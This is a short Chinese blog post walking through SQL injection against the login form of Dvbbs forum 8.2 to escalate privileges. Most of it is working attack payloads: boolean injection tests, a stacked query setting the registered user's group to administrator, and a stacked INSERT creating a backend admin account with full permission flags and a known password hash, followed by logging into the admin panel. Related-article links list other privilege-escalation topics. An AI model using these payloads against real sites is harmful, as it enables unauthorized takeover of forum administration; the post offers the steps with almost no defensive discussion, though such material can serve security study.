美文网首页
过滤不足的提权

过滤不足的提权

作者: 糖no1 | 来源:发表于2018-11-07 11:11 被阅读0次

(动态论坛8.2)


先注册一个账户

然后退出账户登陆,在登陆框尝试注入(1)登录:san’ and ‘a’=’a 密码:1234567 (2)登录:san’ and ‘a’=’b,密码:1234567


提示错误,注入生效,再次注入';update dv_user set usergroupid=1 where username='san'--

(进行提权)

注入完成后,登陆刚开始注册的账号,从管理权限可以看出已经是前台管理权限了




再次推出登陆,

使用以下语句登录,密码为正确密码:san';insert into dv_admin (username,password,flag,adduser) values('san','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','san')--【注意:49ba59abbe56e057是123456的cmd16位密文


打卡管理员网址xxx.xx.xx.x/admin

用注册的账户进行登陆,发现成功提权后台管理

相关文章

  • 过滤不足的提权

    (动态论坛8.2) 先注册一个账户 然后退出账户登陆,在登陆框尝试注入(1)登录:san’ and ‘a’=’a ...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • 【提权】Linux的SUID提权

    0x01 SUID 什么是suid?通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。 0x02...

  • mysql的提权的四种方案

    mysql的提权原理就是让mysql能够执行系统命令,而对与mysql的提权主要分为两种:MOF提权和UDF提权第...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

  • linux 提权-SUID提权

    前言 最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。 权限解读 先来父复习一下l...

  • linux 提权-sudo提权

    前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势...

  • 提权

    目标站点:http://www.xxxx.com 一个新闻发布网站,网站底部备案信息是假的,服务器只能放到国外,这...

  • Windows提权/Linux提权,内网渗透,内网提权

    一个提权靶场,一个关于fire and shadow的世界 这里的提权有:CVE-2019-1388、CVE-20...

  • 2018-05-18-LDAP ATTACKS

    LDAP攻击的原理在对用户的输入并未进行净化和过滤,因此有可能造成命令执行或者提权等操作。 1.LDAP Atta...

网友评论

      本文标题:过滤不足的提权

      本文链接:https://www.haomeiwen.com/subject/tnbmxqtx.html